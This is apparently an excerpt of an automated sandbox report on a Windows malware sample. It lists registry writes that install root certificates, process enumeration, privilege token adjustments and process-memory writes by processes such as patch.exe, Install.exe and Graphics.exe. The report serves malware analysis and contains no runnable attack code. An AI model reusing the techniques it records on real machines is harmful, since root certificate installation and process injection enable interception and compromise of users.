Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time"	Graphics.exe

Modifies system certificate store 2 TTPs 13 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

AJ6TC4hzLC0gagrPExdqgTJ2.execsrss.exepatch.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118\Blob = 0f00000001000000140000001e427a3639cce4c27e94b1777964ca289a722cad09000000010000003e000000303c06082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030806082b060105050703091400000001000000140000006daa9b0987c4d0d422ed4007374d19f191ffded31d000000010000001000000096f98b6e79a74810ce7d398a82f977780b000000010000000e000000430065007200740075006d0000000300000001000000140000006252dc40f71143a22fde9ef7348e064251b181182000000001000000100300003082030c308201f4a0030201020203010020300d06092a864886f70d0101050500303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d204341301e170d3032303631313130343633395a170d3237303631313130343633395a303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ceb1c12ed34f7ccd25ce183e4fc48c6f806a73c85b51f89bd2dcbb005cb1a0fc7503ee81f088ee2352e9e615338dac2d09c576f92b398089e4974b90a5a878f873437ba461b0d858cce16c667e9cf3095e556384d5a8eff3b12e3068b3c43cd8ac6e8d995a904e34dc369a8f818850b76d964209f3d795830d414bb06a6bf8fc0f7e629f67c4ed265f10260f084ff0a45728ce8fb8ed45f66eee255daa6e39bee4932fd947a072ebfaa65bafca533fe20ec69656116ef7e966a926d87f9553ed0a8588ba4f29a5428c5eb6fc852000aa680ba11a85019cc446638288b622b1eefeaa46597ecf352cd5b6da5df748331454b6ebd96fcecd88d6ab1bda963b1d590203010001a3133011300f0603551d130101ff040530030101ff300d06092a864886f70d01010505000382010100b88dceefe714bacfeeb044926cb4393ea2846eadb82177d2d4778287e6204181eee2f811b763d11737be1976241c041a4ceb3daa676f2dd4cdfe653170c51ba6020aba607b6d58c29a49fe63320b6be33ac0acab3bb0e8d309518c1083c634e0c52be01ab66014276c32778cbcb27298cfcdcc3fb9c8244214d657fce62643a91de58090ce0354283ef73fd3f84ded6a0a3a93139b3b142313639c3fd1872779e54c51e301ad855d1a3bb1d57310a4d3f2bc6e64f55a5690a8c70e4c740f2e713bf7c847f4696f15f2115e831e9c7c52aefd02da12a8596718dbbc70dd9bb169ed80ce8940486a0e35ca29661521942ce8602a9b854a40f36b8a24ec06162c73	AJ6TC4hzLC0gagrPExdqgTJ2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118\Blob = 1900000001000000100000000b6cd9778e41ad67fd6be0a6903710440300000001000000140000006252dc40f71143a22fde9ef7348e064251b181180b000000010000000e000000430065007200740075006d0000001d000000010000001000000096f98b6e79a74810ce7d398a82f977781400000001000000140000006daa9b0987c4d0d422ed4007374d19f191ffded309000000010000003e000000303c06082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030806082b060105050703090f00000001000000140000001e427a3639cce4c27e94b1777964ca289a722cad2000000001000000100300003082030c308201f4a0030201020203010020300d06092a864886f70d0101050500303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d204341301e170d3032303631313130343633395a170d3237303631313130343633395a303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ceb1c12ed34f7ccd25ce183e4fc48c6f806a73c85b51f89bd2dcbb005cb1a0fc7503ee81f088ee2352e9e615338dac2d09c576f92b398089e4974b90a5a878f873437ba461b0d858cce16c667e9cf3095e556384d5a8eff3b12e3068b3c43cd8ac6e8d995a904e34dc369a8f818850b76d964209f3d795830d414bb06a6bf8fc0f7e629f67c4ed265f10260f084ff0a45728ce8fb8ed45f66eee255daa6e39bee4932fd947a072ebfaa65bafca533fe20ec69656116ef7e966a926d87f9553ed0a8588ba4f29a5428c5eb6fc852000aa680ba11a85019cc446638288b622b1eefeaa46597ecf352cd5b6da5df748331454b6ebd96fcecd88d6ab1bda963b1d590203010001a3133011300f0603551d130101ff040530030101ff300d06092a864886f70d01010505000382010100b88dceefe714bacfeeb044926cb4393ea2846eadb82177d2d4778287e6204181eee2f811b763d11737be1976241c041a4ceb3daa676f2dd4cdfe653170c51ba6020aba607b6d58c29a49fe63320b6be33ac0acab3bb0e8d309518c1083c634e0c52be01ab66014276c32778cbcb27298cfcdcc3fb9c8244214d657fce62643a91de58090ce0354283ef73fd3f84ded6a0a3a93139b3b142313639c3fd1872779e54c51e301ad855d1a3bb1d57310a4d3f2bc6e64f55a5690a8c70e4c740f2e713bf7c847f4696f15f2115e831e9c7c52aefd02da12a8596718dbbc70dd9bb169ed80ce8940486a0e35ca29661521942ce8602a9b854a40f36b8a24ec06162c73	AJ6TC4hzLC0gagrPExdqgTJ2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118	AJ6TC4hzLC0gagrPExdqgTJ2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	csrss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pub2.exeGraphics.exeGraphics.exe

pid	process
1572	pub2.exe
1572	pub2.exe
1232
1232
1232
1232
1232
1232
1232
1232
1232
1232
1232
1232
1232
1232
1232
1232
1232
1232
1232
1232
1232
1232
1232
1232
1232
548	Graphics.exe
1232
1232
1232
1232
1232
1232
1232
1232
1232
1232
1232
1232
1232
1232
1232
1232
1232
1232
1232
1232
1232
1232
1232
1232
1232
1232
660	Graphics.exe
660	Graphics.exe
1232
660	Graphics.exe
660	Graphics.exe
660	Graphics.exe
1232
1232
1232
1232

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

1232
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

468
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

pub2.exe

pid process

1572 pub2.exe

pid	process
1232

pid	process
468

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Install.exemd9_1sjm.exetaskkill.exeSoCleanInst.exeGraphics.execsrss.exetasklist.exetaskkill.exetasklist.exeIaQybWfoGh37ET5uWcailg0q.exe3NW733gLGF333CMfQpzX0HZg.exeAppLaunch.exeAppLaunch.exeUsoHnPiea5Fp1EKiPPrh0Aj5.exeAppLaunch.exeAppLaunch.exeAppLaunch.exetaskkill.exepowershell.EXE

description	pid	process
Token: SeCreateTokenPrivilege	1384	Install.exe
Token: SeAssignPrimaryTokenPrivilege	1384	Install.exe
Token: SeLockMemoryPrivilege	1384	Install.exe
Token: SeIncreaseQuotaPrivilege	1384	Install.exe
Token: SeMachineAccountPrivilege	1384	Install.exe
Token: SeTcbPrivilege	1384	Install.exe
Token: SeSecurityPrivilege	1384	Install.exe
Token: SeTakeOwnershipPrivilege	1384	Install.exe
Token: SeLoadDriverPrivilege	1384	Install.exe
Token: SeSystemProfilePrivilege	1384	Install.exe
Token: SeSystemtimePrivilege	1384	Install.exe
Token: SeProfSingleProcessPrivilege	1384	Install.exe
Token: SeIncBasePriorityPrivilege	1384	Install.exe
Token: SeCreatePagefilePrivilege	1384	Install.exe
Token: SeCreatePermanentPrivilege	1384	Install.exe
Token: SeBackupPrivilege	1384	Install.exe
Token: SeRestorePrivilege	1384	Install.exe
Token: SeShutdownPrivilege	1384	Install.exe
Token: SeDebugPrivilege	1384	Install.exe
Token: SeAuditPrivilege	1384	Install.exe
Token: SeSystemEnvironmentPrivilege	1384	Install.exe
Token: SeChangeNotifyPrivilege	1384	Install.exe
Token: SeRemoteShutdownPrivilege	1384	Install.exe
Token: SeUndockPrivilege	1384	Install.exe
Token: SeSyncAgentPrivilege	1384	Install.exe
Token: SeEnableDelegationPrivilege	1384	Install.exe
Token: SeManageVolumePrivilege	1384	Install.exe
Token: SeImpersonatePrivilege	1384	Install.exe
Token: SeCreateGlobalPrivilege	1384	Install.exe
Token: 31	1384	Install.exe
Token: 32	1384	Install.exe
Token: 33	1384	Install.exe
Token: 34	1384	Install.exe
Token: 35	1384	Install.exe
Token: SeManageVolumePrivilege	1112	md9_1sjm.exe
Token: SeDebugPrivilege	1160	taskkill.exe
Token: SeDebugPrivilege	684	SoCleanInst.exe
Token: SeDebugPrivilege	548	Graphics.exe
Token: SeImpersonatePrivilege	548	Graphics.exe
Token: SeSystemEnvironmentPrivilege	1852	csrss.exe
Token: SeDebugPrivilege	2616	tasklist.exe
Token: SeDebugPrivilege	3056	taskkill.exe
Token: SeDebugPrivilege	2096	tasklist.exe
Token: SeShutdownPrivilege	1232
Token: SeDebugPrivilege	2356	IaQybWfoGh37ET5uWcailg0q.exe
Token: SeDebugPrivilege	2204	3NW733gLGF333CMfQpzX0HZg.exe
Token: SeDebugPrivilege	2720	AppLaunch.exe
Token: SeDebugPrivilege	2656	AppLaunch.exe
Token: SeDebugPrivilege	2120	UsoHnPiea5Fp1EKiPPrh0Aj5.exe
Token: SeDebugPrivilege	2524	AppLaunch.exe
Token: SeShutdownPrivilege	1232
Token: SeShutdownPrivilege	1232
Token: SeShutdownPrivilege	1232
Token: SeShutdownPrivilege	1232
Token: SeShutdownPrivilege	1232
Token: SeShutdownPrivilege	1232
Token: SeShutdownPrivilege	1232
Token: SeShutdownPrivilege	1232
Token: SeShutdownPrivilege	1232
Token: SeShutdownPrivilege	1232
Token: SeDebugPrivilege	2608	AppLaunch.exe
Token: SeDebugPrivilege	2680	AppLaunch.exe
Token: SeDebugPrivilege	480	taskkill.exe
Token: SeDebugPrivilege	2772	powershell.EXE

Suspicious use of FindShellTrayWindow 17 IoCs

Processes:

Accostarmi.exe.pif

pid process

2768 Accostarmi.exe.pif
1232
1232
1232
1232
2768 Accostarmi.exe.pif
2768 Accostarmi.exe.pif
1232
1232
1232
1232
1232
1232
1232
1232
1232
1232
Suspicious use of SendNotifyMessage 5 IoCs

Processes:

Accostarmi.exe.pif

pid process

2768 Accostarmi.exe.pif
2768 Accostarmi.exe.pif
2768 Accostarmi.exe.pif
1232
1232

pid	process
2768	Accostarmi.exe.pif
1232
1232
1232
1232
2768	Accostarmi.exe.pif
2768	Accostarmi.exe.pif
1232
1232
1232
1232
1232
1232
1232
1232
1232
1232

pid	process
2768	Accostarmi.exe.pif
2768	Accostarmi.exe.pif
2768	Accostarmi.exe.pif
1232
1232

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exeFiles.exeInstall.execmd.exeGraphics.execmd.exe

description	pid	process	target process
